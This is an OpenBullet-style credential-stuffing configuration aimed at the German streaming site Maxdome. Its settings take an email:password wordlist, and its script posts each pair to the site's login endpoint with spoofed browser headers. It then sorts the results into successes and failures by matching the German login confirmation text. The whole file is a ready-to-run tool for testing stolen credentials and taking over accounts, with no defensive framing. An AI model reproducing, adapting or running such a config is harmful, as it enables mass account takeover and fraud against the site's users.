[SETTINGS]
{
  "Name": "Maxdome",
  "SuggestedBots": 1,
  "LastModified": "2019-04-10T20:00:58.1571774+02:00",
  "AdditionalInfo": "",
  "KeysDB": "",
  "LocalKeysDB": "",
  "isWtoEdit": false,
  "Author": "Acemy#7578",
  "Version": "1.2.1.5",
  "IgnoreResponseErrors": false,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#LOGIN REQUEST POST "https://www.maxdome.de/_ajax/process/login/start/login0" 
  CONTENT "userId=<USER>&phrase=<PASS>&autoLogin=true" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: www.maxdome.de" 
  HEADER "Origin: https://www.maxdome.de" 
  HEADER "Referer: https://www.maxdome.de/" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36" 
  HEADER "X-Requested-With: XMLHttpRequest" 
  HEADER "Accept: */*" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "register-now-link" 
  KEYCHAIN Success OR 
    KEY "u003EDu wurdest erfolgreich angemeldet " 

